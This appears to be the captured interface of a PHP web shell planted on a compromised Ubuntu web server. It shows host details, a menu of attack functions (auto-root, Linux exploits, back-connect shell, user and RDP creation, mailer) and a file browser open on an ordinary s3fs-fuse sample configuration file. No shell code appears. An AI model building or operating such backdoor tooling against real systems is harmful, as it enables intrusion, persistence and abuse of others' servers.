Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.58.203.104
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
ubuntu /
s3fs-fuse /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
26.2
KB
-rw-rw-r--
Makefile.am
1.14
KB
-rw-rw-r--
Makefile.in
26.06
KB
-rw-rw-r--
filter-suite-log.sh
4.72
KB
-rwxrwxr-x
integration-test-common.sh
7.27
KB
-rw-rw-r--
integration-test-main.sh
21.38
KB
-rwxrwxr-x
keystore.jks
2.19
KB
-rw-rw-r--
mergedir.sh
4.25
KB
-rwxrwxr-x
passwd-s3fs
32
B
-rw-rw-r--
require-root.sh
103
B
-rwxrwxr-x
s3proxy.conf
318
B
-rw-rw-r--
sample_ahbe.conf
1.89
KB
-rw-rw-r--
sample_delcache.sh
2.45
KB
-rwxrwxr-x
small-integration-test.sh
1.35
KB
-rwxrwxr-x
test-utils.sh
5.94
KB
-rw-rw-r--
write_multiple_offsets.py
375
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sample_ahbe.conf
# S3FS: Sample ahbe_conf parameter file. # # This file is configuration file for additional header by extension(ahbe). # s3fs loads this file at starting. # # Format: # line = [file suffix or regex] HTTP-header [HTTP-header-values] # file suffix = file(object) suffix, if this field is empty, # it means "reg:(.*)".(=all object). # regex = regular expression to match the file(object) path. # this type starts with "reg:" prefix. # HTTP-header = additional HTTP header name # HTTP-header-values = additional HTTP header value # # <suffix(extension)> <HTTP header> <HTTP header values> # # Verification is done in the order in which they are described in the file. # That order is very important. # # Example: # " Content-Encoding gzip" --> all object # ".gz Content-Encoding gzip" --> only ".gz" extension file # "reg:^/DIR/(.*).t2$ Content-Encoding text2" --> "/DIR/*.t2" extension file # # Notice: # If you need to set all object, you can specify without "suffix" or regex # type "reg:(.*)". Then all of object(file) is added additional header. # If you have this configuration file for Content-Encoding, you should # know about RFC 2616. # # "The default (identity) encoding; the use of no transformation # whatsoever. This content-coding is used only in the Accept- # Encoding header, and SHOULD NOT be used in the Content-Encoding # header." # # file suffix type .gz Content-Encoding gzip .Z Content-Encoding compress .bz2 Content-Encoding bzip2 .svgz Content-Encoding gzip .svg.gz Content-Encoding gzip .tgz Content-Encoding gzip .tar.gz Content-Encoding gzip .taz Content-Encoding gzip .tz Content-Encoding gzip .tbz2 Content-Encoding gzip gz.js Content-Encoding gzip # regex type(test) reg:^/MYDIR/(.*)[.]t2$ Content-Encoding text2
Close